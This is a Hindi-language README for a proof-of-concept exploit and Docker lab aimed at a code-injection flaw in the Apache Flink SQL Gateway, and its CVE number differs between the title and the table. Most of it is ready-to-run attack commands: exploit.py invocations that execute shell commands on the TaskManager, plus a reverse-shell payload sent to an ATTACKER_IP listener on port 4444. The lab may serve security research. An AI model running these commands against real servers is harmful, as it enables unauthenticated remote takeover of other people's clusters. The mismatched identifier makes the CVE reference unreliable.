
CVE-2026-25194 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और लैब वातावरण
| CVE | CVE-2026-35194 |
| CVSS | 8.1 (उच्च) |
| CWE | CWE-94 — कोड इंजेक्शन |
| प्रभावित | Flink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0 |
| समाधान | 1.20.4 / 2.0.2 / 2.1.2 / 2.2.1 |
| हमला सतह | SQL Gateway REST API (डिफ़ॉल्ट पोर्ट 8083, बिना प्रमाणीकरण) |
docker compose up -d
क्लस्टर शुरू होने के लिए लगभग 30 सेकंड प्रतीक्षा करें। दो सेवाएँ शुरू होती हैं:
http://localhost:8081http://localhost:8083जाँच करें:
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"
pip install requests
JSON वेक्टर:
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"
LIKE वेक्टर:
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"
केवल संस्करण जाँच (RCE नहीं):
python3 exploit.py localhost -p 8083 --check-only
TaskManager पर RCE सत्यापित करें:
docker exec flink-taskmanager cat /tmp/pwned
# टर्मिनल 1 — सुनने वाला
nc -lvnp 4444
# टर्मिनल 2 — शोषण
python3 exploit.py TARGET -p 8083 -v json \
-c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
[--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
target
विकल्प:
target लक्ष्य होस्ट (IP या होस्टनाम)
-p, --port SQL Gateway पोर्ट (डिफ़ॉल्ट: 8083)
-c, --command TaskManager पर चलाने के लिए शेल कमांड
-v, --vector json (डिफ़ॉल्ट) या like
--check-only केवल संस्करण जाँच, कोई शोषण नहीं
-t, --timeout सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 30)
--cert / --key mTLS वातावरण के लिए क्लाइंट प्रमाणपत्र + कुंजी
--ssl HTTPS बाध्य करें
केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।